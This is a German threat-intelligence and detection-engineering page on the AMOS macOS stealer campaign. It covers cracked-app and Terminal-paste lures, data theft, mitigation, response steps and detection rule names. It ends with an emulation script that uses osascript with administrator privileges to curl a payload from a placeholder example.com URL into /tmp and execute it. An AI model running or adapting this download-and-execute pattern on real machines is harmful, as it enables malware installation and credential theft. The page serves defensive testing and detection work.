AMOS Stealer zielt mit „geknackten“ Apps auf macOS ab
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht beschreibt eine Kampagne, bei der Atomic macOS Stealer (AMOS) verteilt wird, indem er als gehackte Anwendungen getarnt oder den Nutzern das Ausführen von Terminal-Befehlen durch Kopieren und Einfügen befohlen wird. Nach dem Ausführen sammelt die Malware eine breite Palette an sensiblen Daten, darunter Anmeldeinformationen, Browser-Informationen, Kryptowährungs-Wallets, Dateien von Messaging-Anwendungen, VPN-Profile und persönliche Dokumente, die dann über HTTP oder HTTPS exfiltriert werden. Um statische Erkennungen zu vermeiden, wechseln die Betreiber die Domains und URLs während der Kampagne. Die Aktivität richtet sich an macOS-Nutzer, insbesondere solche, die inoffizielle oder raubkopierte Software suchen.
Untersuchung
Trend Vision One Telemetrie wurde verwendet, um die vollständige Infektionskette zu rekonstruieren, beginnend mit dem Herunterladen gehackter Anwendungen von haxmac.cc, gefolgt von Umleitungen über Zwischendomänen, Ausführung bösartiger Shell-Skripte, Erstellung von Launch-Daemons zur Persistenz, Bereitstellung von Daten in /tmp, Komprimierung in ZIP-Archive und Exfiltration zu rotierenden, von Angreifern kontrollierten Domains. Forscher erfassten die relevanten Befehlszeilen, Dateipfade und Verhaltensindikatoren, die mit jeder Stufe des Kompromisses verbunden sind.
Minderung
Organisationen sollten Benutzer über die Risiken von gehackter Software und Kopieren-Einfügen von Terminal-Befehlen informieren, Gatekeeper- und Notarisierungskontrollen durchsetzen und unnötige Skriptausführung auf macOS-Systemen einschränken. Verteidiger sollten auch nach verdächtiger curl and osascript -Aktivität Ausschau halten und den Zugriff auf bekannte bösartige Domains und IP-Adressen blockieren. Endpunkterkennungen sollten sich auf die unbefugte Erstellung von Launch-Daemons, das Verbergen von Dateien und ungewöhnliches Kollektieren oder Exfiltrieren von Dateien konzentrieren.
Antwort
Wenn AMOS-Aktivität erkannt wird, isolieren Sie den betroffenen Endpunkt, beenden Sie die bösartigen Prozesse, entfernen Sie versteckte Dateien wie .helper, .agent, und com.finder.helper.plist, und löschen Sie alle für die Exfiltration vorbereiteten Daten. Kompromittierte Anmeldeinformationen sollten widerrufen werden, und eine forensische Analyse sollte an allen wiederhergestellten Archiven durchgeführt werden. Die identifizierte bösartige Infrastruktur sollte blockiert und die Erkennungsinhalte aktualisiert werden, um die beobachteten Befehlsmuster zu überwachen.
Angriffsfluss
Erkennungen
Verdächtige Nutzung von Ditto zum Archivieren und Exfiltrieren von Dateien auf macOS (via Prozess-Erstellung)
Ansehen
Mögliche Mehrfach-Datei-Bereitstellung im TMP-Verzeichnis zur Exfiltration (via Datei-Ereignis)
Ansehen
Atomic macOS Stealer – FileGrabber Aktivität
Ansehen
Mögliche Chrome-Anmeldedaten in TMP-Verzeichnis kopiert (via Prozess-Erstellung)
Ansehen
IOCs (HashSha1) zur Erkennung: Analyse der AMOS Stealer-Kampagne, die macOS über ‚gehackte‘ Apps angreift
Ansehen
IOCs (SourceIP) zur Erkennung: Analyse der AMOS Stealer-Kampagne, die macOS über ‚gehackte‘ Apps angreifen
Ansehen
IOCs (DestinationIP) zur Erkennung: Analyse der AMOS Stealer-Kampagne, die macOS über ‚gehackte‘ Apps angreifen
Ansehen
Erkennung der AMOS Stealer- Ausführung über Terminal-Befehle auf macOS [Linux-Prozess-Erstellung]
Ansehen
Erkennung der AMOS Stealer- Ausführung über AppleScript und Curl [Linux-Prozess-Erstellung]
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie- & Baseline-Preflight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die exakte Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu einer Fehldiagnose.
-
Angriffsgeschichte & Befehle:
Ein Angreifer hat einen Phishing-Köder erhalten, der eine kurze AppleScript-Nutzlast liefert. Das Skript verwendetosascriptum einen Shell-Befehl auszuführen (sh -c), dercurlaufruft, um das AMOS Stealer-Binär aus einem bösartigen C2-Server herunterzuladen, es im Benutzerverzeichnis~/Library/Application Support/speichert und es dann mit erhöhten Rechten ausführt. Die Nutzung vonosascript(einer signierten Apple-Binärdatei) tarnt die Aktivität als legitime Automatisierung, währendcurleinen unauffälligen Netzwerkdownload ermöglicht. -
Regressionstest-Skript:
# amos_stealer_simulation.sh # Simuliert die Ausführung des AMOS Stealers auf macOS mit osascript + curl # 1. Definiere bösartige URL (verwenden Sie einen harmlosen Platzhalter zur Sicherheit) MALICIOUS_URL="https://example.com/malicious_payload.sh" # 2. AppleScript, das einen Shell-Befehl ausführt, um die Nutzlast herunterzuladen & auszuführen APPLESCRIPT=$(cat <<'EOF' do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges EOF ) # 3. Führt das AppleScript über osascript aus echo "$APPLESCRIPT" | osascript # 4. Pause kurz, um der Nutzlast Zeit zum Ausführen zu geben sleep 5 -
Bereinigungskommandos:
# cleanup_amos_simulation.sh # Entfernt Artefakte, die durch die Simulation erstellt wurden # Entferne die heruntergeladene Nutzlast rm -f /tmp/payload.sh # Widerrufe alle temporären erhöhten Prozesse (falls noch laufend) pkill -f "/tmp/payload.sh" || true # Optional, löschen Sie die AppleScript-Ausführungshistorie # (macOS behält keinen persistenten Verlauf für osascript) echo "Bereinigung abgeschlossen."